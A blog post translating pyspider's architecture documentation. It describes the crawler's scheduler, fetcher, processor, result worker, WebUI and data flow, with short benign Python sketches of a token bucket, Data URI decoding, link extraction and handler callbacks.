pyspider crawler study - documentation translation - Architecture

sijinge · 2017/08/31 23:02
Architecture
============
This document describes why I made pyspider and its architecture.

Why?
---
Two years ago, I was working at a vertical search engine. We faced the following crawling needs:
1. Collect 100-200 websites; they may go on/offline or change their templates at any time.
> We need a really powerful monitor to find out which websites are changing, and a good tool to help us write a script/template for each website.
2. Data should be collected within 5 minutes of a website update.
> We solve this by checking index pages frequently, and using fields like 'last update time' or 'last reply time' to determine which pages have changed. In addition, we recheck pages after X days to prevent omissions.
> **pyspider will never stop, as the WWW is changing all the time**

Furthermore, we have some APIs from our partners; these APIs may need POST, a proxy, request signatures, etc. Full control from the script is more convenient than a few global parameters on components.

Overview
--------
The following diagram shows an overview of the pyspider architecture with its components, and an outline of the data flow that takes place inside the system.

![pyspider](imgs/pyspider-arch.png)
Components are connected by message queues. Every component, including the message queues, runs in its own process/thread and is replaceable. That means that when processing is slow, you can run many instances of the processor to make full use of multiple CPUs, or deploy to multiple machines. This architecture makes pyspider really fast. See the [benchmarking](https://gist.github.com/binux/67b276c51e988f8e2c31#comment-1339242).

Components
----------

### Scheduler
The scheduler receives tasks from the processor via `newtask_queue`. It decides whether a task is new or requires a re-crawl, sorts tasks by priority, and feeds them to the fetcher with traffic control (the [token bucket](http://en.wikipedia.org/wiki/Token_bucket) algorithm). It also takes care of periodic, lost, and failed tasks, and retries them later.
All of the above can be set via the `self.crawl` [API](apis/).

Note that in the current implementation of the scheduler, only one scheduler instance is allowed.
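The traffic control mentioned above can be sketched as a minimal token bucket. This is an illustrative stand-alone implementation, not pyspider's actual scheduler code; the class and parameter names are assumptions made for the sketch:

```python
import time

class TokenBucket:
    """Minimal token bucket: allow at most `rate` requests per second,
    with bursts of up to `burst` requests."""

    def __init__(self, rate, burst):
        self.rate = rate      # tokens added per second
        self.burst = burst    # maximum bucket size
        self.tokens = burst   # start with a full bucket
        self.last = time.time()

    def consume(self, n=1):
        """Take n tokens if available; return True on success."""
        now = time.time()
        # refill proportionally to elapsed time, capped at the burst size
        self.tokens = min(self.burst, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= n:
            self.tokens -= n
            return True
        return False

bucket = TokenBucket(rate=1, burst=3)
allowed = [bucket.consume() for _ in range(5)]
# the first `burst` requests pass immediately; the rest must wait for refill
```

A scheduler using such a bucket would simply hold back a task when `consume()` returns `False` and retry it on the next tick.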

### Fetcher
The fetcher is responsible for fetching web pages and sending the results to the processor. For flexibility, the fetcher supports the [Data URI](http://en.wikipedia.org/wiki/Data_URI_scheme) scheme and pages rendered by JavaScript (via [phantomjs](http://phantomjs.org/)). The fetch method, headers, cookies, proxy, etag, etc. can be controlled by the script via the [API](apis/self.crawl/#fetch).
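Data URI support means a "page" can be carried entirely inside the URL itself, so no network request is needed. A minimal sketch of decoding one (this is only an illustration of the scheme, not pyspider's fetcher):

```python
import base64
from urllib.parse import unquote

def fetch_data_uri(uri):
    """'Fetch' a data: URI without touching the network.
    Handles both the base64 and the percent-encoded forms."""
    assert uri.startswith("data:")
    header, _, payload = uri.partition(",")
    if header.endswith(";base64"):
        return base64.b64decode(payload)
    return unquote(payload).encode()

html = fetch_data_uri("data:text/html;base64," +
                      base64.b64encode(b"<html>hello</html>").decode())
# html is now the page body, ready to be fed to the processor
```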

### Phantomjs Fetcher 
The phantomjs fetcher works like a proxy. It connects to the general fetcher, fetches and renders pages with JavaScript enabled, and outputs plain HTML back to the fetcher:

```
scheduler -> fetcher -> processor
                |
            phantomjs
                |
             internet
```

### Processor
The processor is responsible for running the script written by the user to parse and extract information. Your script runs in an unlimited environment. Although we provide various tools (like [PyQuery](https://pythonhosted.org/pyquery/)) for extracting information and links, you can use anything you want to deal with the response. You may refer to [Script Environment](Script-Environment) and the [API Reference](apis/) for more information about scripts.
The processor captures exceptions and logs, sends status (task track) and new tasks to the `scheduler`, and sends results to the `Result Worker`.
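As a concrete illustration of "use anything you want to deal with the response", here is a link extractor built only on the standard library (a pyspider script would more typically use PyQuery via `response.doc`, but nothing forces that choice):

```python
from html.parser import HTMLParser

class LinkExtractor(HTMLParser):
    """Collect href attributes from <a> tags in a fetched page."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)

page = '<html><a href="http://example.com/1">one</a><a href="/2">two</a></html>'
parser = LinkExtractor()
parser.feed(page)
# parser.links now holds the candidate URLs a script would pass to self.crawl
```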

### Result Worker (optional)
The result worker receives results from the `Processor`. pyspider has a built-in result worker that saves results to `resultdb`. Overwrite it to handle results according to your needs.
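Overwriting the result worker might look like the sketch below. The base class here is a simplified stand-in for pyspider's actual `ResultWorker` (whose override hook is `on_result`), so treat the surrounding details as assumptions:

```python
import json

class ResultWorker:
    """Stand-in for pyspider's result worker (assumption for this sketch)."""

    def on_result(self, task, result):
        raise NotImplementedError

class JsonLineResultWorker(ResultWorker):
    """Keep each result as one JSON line instead of writing to resultdb."""

    def __init__(self):
        self.lines = []  # a real override would write to a file or database

    def on_result(self, task, result):
        if not result:
            return  # entry tasks like on_start usually produce no result
        self.lines.append(json.dumps({"taskid": task.get("taskid"),
                                      "url": task.get("url"),
                                      "result": result}))

worker = JsonLineResultWorker()
worker.on_result({"taskid": "abc", "url": "http://example.com/"},
                 {"title": "hello"})
```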

### WebUI
The WebUI is a web frontend for everything. It contains:

* script editor and debugger
* project manager
* task monitor
* result viewer and exporter

Maybe the WebUI is the most attractive part of pyspider. With this powerful UI, you can debug your scripts step by step just as pyspider runs them, start or stop a project, find out which project is going wrong and which request failed, and try it again with the debugger.

Data flow
---------
The data flow in pyspider is just as shown in the diagram above:
1. Each script has a callback named `on_start`. When you press the `Run` button on the WebUI, a new `on_start` task is submitted to the scheduler as the entry point of the project.
2. The scheduler dispatches this `on_start` task, with a Data URI, as a normal task to the fetcher.
3. The fetcher makes the request and builds a response for it (for a Data URI, it's a fake request and response, but there is no difference from other normal tasks), then feeds it to the processor.
4. The processor calls the `on_start` method and generates some new URLs to crawl. Via the message queue, the processor sends the scheduler a message that this task is finished, along with the new tasks (in most cases there are no results for `on_start`; if there are, the processor sends them to the `result_queue`).
5. The scheduler receives the new tasks, looks them up in the database, determines whether each task is new or requires a re-crawl, and if so, puts it into the task queue. It then dispatches tasks in order.
6. The process repeats (from step 3) and won't stop until the WWW is dead ;-). The scheduler checks periodic tasks in order to crawl the latest data.
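The callback chain in the steps above can be sketched with a stub handler. `BaseHandler` and `crawl` here are simplified stand-ins for pyspider's real ones (which live in `pyspider.libs.base_handler`), kept minimal just to make the flow runnable:

```python
class BaseHandler:
    """Stand-in for pyspider's BaseHandler (assumption for this sketch)."""

    def __init__(self):
        self.scheduled = []  # tasks that would be sent to the scheduler

    def crawl(self, url, callback=None, **kwargs):
        self.scheduled.append((url, callback.__name__ if callback else None))

class Handler(BaseHandler):
    def on_start(self):
        # steps 1-2: the entry task, dispatched by the scheduler with a Data URI
        self.crawl("http://example.com/", callback=self.index_page)

    def index_page(self, response):
        # step 4: parsing the response yields new tasks for the scheduler
        for url in response["links"]:
            self.crawl(url, callback=self.detail_page)

    def detail_page(self, response):
        # a returned result would be sent to the result_queue
        return {"url": response["url"]}

handler = Handler()
handler.on_start()
handler.index_page({"links": ["http://example.com/a", "http://example.com/b"]})
# handler.scheduled now lists every task handed to the (stub) scheduler
```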
